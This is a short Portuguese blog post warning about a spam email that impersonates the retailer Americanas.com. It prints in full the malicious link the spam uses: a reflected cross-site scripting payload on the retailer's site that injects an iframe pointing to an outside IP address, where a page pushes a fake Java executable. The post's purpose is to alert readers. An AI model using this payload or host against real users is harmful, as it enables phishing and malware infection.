Salve,
Soube hoje de um spam em nome da Americanas.com onde no botão ele simplemente joga para o site da Americanas.com, humm legal…nada de diferente.
Mas ai que entra a trapaça com muita inteligência, que pegaria até muitos desenvolvedores web e cia. Ele simplesmente no link, após o endereço da Americanas.com colocar um Javascript que adiciona na página da Americanas.com um iframe onde abre um html, que no Firefox não funcionou via iframe, a lógica seria abrir a página ( NÃO CLICAR: 203.124.22.143/java/index.htm ) e lá forçava a instalação do “java”, que pra mim só funcionou quando abri a página.
Não instalei, mas no link de instalação do java, que tem na página, vai pra um .exe no próprio servidor, e Java é melhor baixar somente da Sun, e em último caso ou necessidade das fabricantes como IBM, Microsoft que possuem suas VMs. Na página tem um formulário falando da Promoção Cliente Especial, onde você deveria preencher e enviar, eu enviei sem preencher e foi normal, fizendo que foi enviada com sucesso.
Link Principal:
http://carrinho.americanas.com.br/portal/meuCadastro.portal?_nfpb=true&LoginControllerPortlet_actionOverride=%3Cscript%3Ewindow.onload=function(){with(document.body.style){border=%22none%22;margin=%220%200%200%200%22};document.body.innerHTML=%27%3Ciframe%20src=http%3A%2F/203.124.22.143/java/index.htm%20style=border%3Anone;height%3A700;width%3A1000%3E%27};document.title=%27Americanas%27%3C/script%3E%3Ctextarea%3E
Pela confiança do endereço que o usuário é direcionado ser o americanas.com muitos se passam e vão cair legal.
Fica o Aviso.
ele ainda está como terramel.wordpress.com e um tempo atrás troquei o endereço para terramel.org 
Últimos Comentários